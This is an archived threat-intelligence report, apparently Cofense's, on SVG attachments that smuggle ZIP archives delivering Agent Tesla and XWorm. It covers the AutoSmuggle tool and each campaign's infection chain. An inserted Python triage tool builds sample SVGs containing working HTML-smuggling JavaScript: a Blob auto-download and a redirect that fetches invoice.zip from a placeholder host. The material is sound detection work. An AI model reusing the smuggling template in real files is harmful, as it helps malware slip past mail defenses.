{
	"id": "6033031e-785a-4170-ad17-d335bcdd80a6",
	"created_at": "2026-04-06T00:14:23.240198Z",
	"updated_at": "2026-04-10T03:21:41.819162Z",
	"deleted_at": null,
	"sha1_hash": "b3991732a58c9bb0a6fdfce5099066e92817f5a4",
	"title": "SVG Files Abused in Emerging Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 950032,
	"plain_text": "SVG Files Abused in Emerging Campaigns\r\nArchived: 2026-04-05 20:33:55 UTC\r\nBy: Max Gannon\r\nScalable Vector Graphics (SVG) files are image files that have become a malware delivery vector, and the tactic has evolved considerably over time. Using SVG files to deliver malware became even easier when AutoSmuggle, a program that embeds malicious files in HTML or SVG content, was released in May 2022.\r\nThreat actors have recently begun to make extensive use of AutoSmuggle in two distinct campaigns, one starting in December 2023 and the other in January 2024.\r\nMain Takeaways\r\nSVG files have been used to deliver malware at scale since as early as 2015.\r\nSVG files have been used to deliver many types of malware (including Ursnif and QakBot) and have even been chained with exploitation of a CVE.\r\nDifferent forms of HTML smuggling techniques have been used with SVG files for some time.\r\nThe tool AutoSmuggle (published in 2022) was created to simplify the process of using SVG files to deliver malware.\r\nTwo recent campaigns appeared to use AutoSmuggle to deliver malware.\r\nThe December 2023 campaign delivered XWorm RAT and is ongoing.\r\nThese campaigns made up 30% of XWorm RAT campaigns seen during this time.\r\nThe January 2024 campaign delivered Agent Tesla Keylogger and lasted until mid-February.\r\nThese campaigns made up 5% of Agent Tesla Keylogger campaigns seen during this time.\r\nFirst Uses and Notable Uses\r\nThe first major incident was in 2015, when SVG files were used to deliver ransomware. In this case, the SVG files used embedded content to download malicious files, which the victim was then required to interact with.\r\nCofense first observed SVG files being used to deliver malicious content via URLs in January 2017, when they were used to download Ursnif.\r\nThe next major use of SVG files for malware delivery at scale was in 2022, when they were used to deliver .zip archives embedded in the SVG files. 
These archives contained malware that was used to deliver QakBot. This use of SVG files containing embedded objects via HTML smuggling differed from previous SVG files, which only downloaded content from an external source when opened.\r\nThe next major use of SVG files chained an exploit (CVE-2023-5631, a cross-site scripting flaw in Roundcube triggered by a crafted SVG in an email) with the smuggling capabilities of the file format to gain access to Roundcube webmail. More recently, SVG files have been used in two separate campaigns: one delivering Agent Tesla Keylogger and the other delivering XWorm RAT.\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 1 of 9\r\nThe different tactics used in each of these campaigns, together with the use of SVG files, demonstrate how versatile SVG files are.\r\nFigure 1: Infection chain of notable SVG file delivery campaigns.\r\nAutoSmuggle Tool\r\nAutoSmuggle was uploaded to GitHub in May 2022. The tool takes a file such as an executable or an archive and “smuggles” it into an SVG or HTML file, so that when the SVG or HTML file is opened, the “smuggled” file is delivered. The brief description of AutoSmuggle from its GitHub page can be seen in Figure 2.\r\nFigure 2: AutoSmuggle is an open-source tool that threat actors can easily abuse.\r\nIn this context, “smuggling” refers to a method of taking a malicious file and getting it past Secure Email Gateways (SEGs) and other network defenses so that it reaches the victim. If a malicious file was not “smuggled” but was instead attached directly to an email, it would be scanned, its contents would likely be detected, and the email would be quarantined.\r\nThreat actors seek to avoid this by disguising the malicious file as legitimate HTML content. 
Once the malicious content is successfully “smuggled” past the SEG and the victim opens the HTML/SVG file, the malicious content is decoded and delivered. There are many different ways to smuggle files via HTML/SVG. The method most commonly used in the emerging campaigns was .zip archives embedded in SVG files. An example of a .zip archive embedded in an SVG file with AutoSmuggle can be seen in Figure 3.\r\nFigure 3: Example contents of an SVG file generated by AutoSmuggle.\r\nThe method of smuggling used by AutoSmuggle (base64ToArrayBuffer, in which the payload is stored as a base64 string, decoded by script into a byte array, wrapped in a Blob and handed to the browser as a download) is one of the 9 commonly seen types described in our Strategic Analysis “HTML Smuggling of Malware and QakBot”.\r\nTypes Of Usage\r\nThere are 2 primary ways that content embedded in SVG files can be used to deliver malware. Both depend on the fact that SVG is an XML document format that may contain <script> elements, which a browser executes when the SVG file is opened directly (not when it is merely displayed through an <img> tag). Regardless of the method used, when the SVG file is opened in a browser, the browser will likely show that a file has been downloaded.\r\nJavaScript Direct Download\r\nThe first use of SVG files to deliver malware was via embedded URLs. When opened, the contents of the original 2015 SVG file, an example of which is shown in Figure 4, were used to download a payload.\r\nFigure 4: First-generation SVG file contents downloading an archive from an external source.\r\nLater SVG files, such as the ones in the 2017 campaign, looked like Figure 5 and displayed an image when opened, as seen in Figure 6, in order to distract the victim and make it more likely that they would interact with the downloaded file.\r\nFigure 5: Next-generation SVG file contents downloading a file from an external source and displaying an image.\r\nFigure 6: Next-generation SVG file image displayed on opening. 
\r\nIn both the 2015 and 2017 campaigns the SVG files downloaded malicious content from external sources rather than smuggling it as embedded content.\r\nHTML Style Embedded Object\r\nSVG files using HTML-style smuggling techniques were introduced later and, rather than relying on external resources, deliver the embedded malicious file when opened. An example of this can be seen in Figure 3 above. These files do not typically display an image when opened; instead, they rely on the victim’s curiosity to prompt them to engage with the delivered file.\r\nThe reason threat actors use SVG files is that, apart from the unusual file type and extension, SVG files are treated with less suspicion than HTML files or archives. SVG files are often handled as image files rather than as documents that can carry script, so a file inside an SVG is less likely to be scanned than one inside an HTML attachment or one attached directly. Defenders should treat a .svg attachment that contains a <script> element exactly as they would an HTML attachment.\r\nAgent Tesla Campaign\r\nFigure 7: Infection chain of Agent Tesla Keylogger campaign.\r\nEmail Details\r\nThe campaigns using SVG files to deliver Agent Tesla Keylogger were consistent in their infection chain. Each email had an attached SVG file which, when opened, delivered an embedded .zip archive. The archive contained a JavaScript file, which downloaded a series of payloads, starting with one hosted on BlogSpot, before decoding several of the payloads and running Agent Tesla Keylogger.\r\nFigure 8: Email delivering an attached SVG file that initiates a chain to deliver Agent Tesla Keylogger. 
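A worked example, added here and not taken from the Cofense post or from AutoSmuggle, that turns the two usage types above (a script that fetches a payload from an external URL, and an HTML-style embedded object decoded with base64ToArrayBuffer) into a triage check a mail gateway or sandbox pipeline could run on a .svg attachment. It parses the SVG as XML, inspects every script element for decode, Blob, forced-download, redirect and delay indicators, decodes any long base64 run and identifies it by magic bytes, and lists the members of an embedded ZIP. Both sample SVGs are constructed inside the block; the JavaScript in them follows the widely published HTML-smuggling pattern rather than AutoSmuggle's exact output, and the hostname example.invalid is a placeholder, not one seen in the campaigns.

```python
# Added example (not code from the Cofense post, nor from AutoSmuggle): static triage
# of an SVG attachment for the two delivery patterns described in the post.
import base64
import binascii
import io
import re
import zipfile
import xml.etree.ElementTree as ET

ZIP_MAGIC = bytes([0x50, 0x4B, 0x03, 0x04])   # PK local file header
MZ_MAGIC = bytes([0x4D, 0x5A])                 # MZ, a PE executable
XLINK_HREF = '{http://www.w3.org/1999/xlink}href'
# Substring indicators of smuggling logic inside a <script> element; deliberately simple.
INDICATORS = {
    'base64_decode': ('atob(', 'base64ToArrayBuffer'),
    'blob_download': ('new Blob(', 'createObjectURL', '.download'),
    'auto_click': ('.click()',),
    'redirect': ('location.href', 'window.location', 'location.replace'),
    'delay': ('setTimeout',),
}

def extract_payloads(script_text):
    # A long base64 run is the smuggled object: decode it and identify it by magic bytes.
    found = []
    for run in re.findall('[A-Za-z0-9+/=]{200,}', script_text):
        try:
            data = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue
        kind = 'zip' if data.startswith(ZIP_MAGIC) else 'pe' if data.startswith(MZ_MAGIC) else 'unknown'
        entry = {'size': len(data), 'kind': kind, 'members': []}
        if kind == 'zip':
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    entry['members'] = zf.namelist()
            except zipfile.BadZipFile:
                entry['kind'] = 'zip_corrupt'
        found.append(entry)
    return found

def triage_svg(svg_text):
    root = ET.fromstring(svg_text)
    report = {'scripts': 0, 'indicators': [], 'payloads': [], 'external_urls': []}
    for el in root.iter():
        # Namespace-qualified tags look like {http://www.w3.org/2000/svg}script
        if el.tag.rsplit('}', 1)[-1] == 'script':
            report['scripts'] += 1
            body = el.text or ''
            for label, needles in INDICATORS.items():
                if any(n in body for n in needles) and label not in report['indicators']:
                    report['indicators'].append(label)
            report['payloads'].extend(extract_payloads(body))
            report['external_urls'].extend(re.findall('https?://[A-Za-z0-9./_-]+', body))
        # Remote references in href attributes (plain or xlink:) also count as a fetch.
        for attr in ('href', XLINK_HREF):
            val = el.get(attr, '')
            if val.startswith('http://') or val.startswith('https://'):
                report['external_urls'].append(val)
    return report

def verdict(report):
    # An embedded object (HTML-style smuggling) outranks a remote fetch (first generation).
    if report['payloads'] or 'base64_decode' in report['indicators']:
        return 'embedded_object'
    if report['scripts'] and report['external_urls']:
        return 'remote_fetch'
    return 'no_delivery_logic'

def build_embedded_sample():
    # Constructed sample: a ZIP holding a harmless script, carried the way an HTML-smuggling
    # SVG carries it, followed by a delayed redirect to a decoy page. The hostname
    # example.invalid is a placeholder, not one seen in the campaigns.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('payload.js', 'WScript.Echo(1);' * 40)
    b64 = base64.b64encode(buf.getvalue()).decode()
    script = '''
function base64ToArrayBuffer(b64) {
  var bin = atob(b64), bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) { bytes[i] = bin.charCodeAt(i); }
  return bytes.buffer;
}
var blob = new Blob([base64ToArrayBuffer('PAYLOAD')], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob); a.download = 'invoice.zip'; a.click();
setTimeout(function () { window.location.href = 'https://example.invalid/'; }, 1500);
'''.replace('PAYLOAD', b64)
    return '''<svg xmlns='http://www.w3.org/2000/svg'>
<script type='text/javascript'><![CDATA[''' + script + ''']]></script>
</svg>'''

def build_remote_sample():
    # Constructed sample of the older pattern: no embedded object, only a remote fetch.
    return '''<svg xmlns='http://www.w3.org/2000/svg'>
<script type='text/javascript'><![CDATA[
window.location = 'https://example.invalid/invoice.zip';
]]></script>
</svg>'''
```

Run triage_svg on the text of an attachment and feed verdict() to the quarantine rule: a result of embedded_object means the payload itself is inside the file and can be pulled from report['payloads'] for further scanning, while remote_fetch means the URL list is the indicator to block. The substring indicators are intentionally crude and will miss obfuscated scripts, so treat them as a first pass that escalates the file to full HTML-attachment handling, not as a detection boundary.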
\r\nWhere Used SVGs Diverge from AutoSmuggle\r\nTo compare the attached SVG files with what an AutoSmuggle-generated version would look like, the .zip archive dropped by the attached SVG file was used to generate a sample SVG file with AutoSmuggle, which can be seen in Figure 3. The SVG files used in the Agent Tesla Keylogger campaigns differed from the AutoSmuggle-generated sample in two key places. The first is line 2, where the sample file generated by AutoSmuggle (shown in Figure 3) has a line of code that draws the image seen in Figure 12; the campaign files omit it.\r\nThe second is the section in Figure 9 beginning with the comment “Redirect after a delay”. The code after this comment redirects the browser to the Maersk webpage, so that when the file is downloaded, it appears to come from Maersk rather than from a local file.\r\nBy removing the extraneous red circle and replacing it with the Maersk webpage, the threat actors are better able to trick victims into interacting with the downloaded file. The fact that only two sections were altered indicates that the threat actors used the AutoSmuggle tool and then slightly modified its output.\r\nFigure 9: Contents of an SVG file delivering an archive when opened.\r\nXWorm RAT Campaign\r\nFigure 10: Infection chain of XWorm RAT campaigns.\r\nEmail Details\r\nThe campaigns using SVG files to deliver XWorm RAT were consistent in their theme but not in their infection chain. There were three distinct infection chains. The first had an attached PDF file with an embedded link. The embedded link downloaded an SVG file which dropped an embedded .zip archive when opened. The archive contained a VBS file which downloaded a series of payloads from free file hosting services before running XWorm RAT and related files. 
\r\nThe second, seen in Figure 11, had an embedded link that downloaded an SVG file that dropped an embedded .zip archive when opened. The archive contained a WSF script that downloaded a series of payloads before running XWorm RAT.\r\nThe third and final infection chain had an attached SVG which, when opened, delivered a .zip archive. The archive contained a VBS file which downloaded a series of payloads from free file hosting services before running XWorm RAT and related files.\r\nFigure 11: Email delivering an SVG file via an embedded URL which initiates a chain to deliver XWorm RAT.\r\nWhere Used SVGs Diverge from AutoSmuggle\r\nThe SVG files used to deliver XWorm RAT had only one key difference from the AutoSmuggle-generated versions for the same .zip archive payload: line 2 in Figure 3 (the sample file generated by AutoSmuggle). This line draws the image seen in Figure 12, and it is removed from all SVG files used in these campaigns to deliver malware.\r\nIn the SVG files used to deliver Agent Tesla Keylogger, this removal was paired with a redirect that made the .zip download appear to come from Maersk. In the SVG files used to deliver XWorm RAT, a blank page is displayed instead. While this blank page may appear less interesting, or at least more legitimate, than a red dot, it is unclear why the threat actors behind the XWorm RAT campaigns put in less effort than those behind the Agent Tesla Keylogger campaigns and did not include some kind of legitimate image or redirect.\r\nFigure 12: Image automatically added to AutoSmuggle SVG files.\r\nSource: https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/"
	],
	"report_names": [
		"svg-files-abused-in-emerging-campaigns"
	],
	"threat_actors": [],
	"ts_created_at": 1775434463,
	"ts_updated_at": 1775791301,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.pdf",
		"text": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.txt",
		"img": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.jpg"
	}
}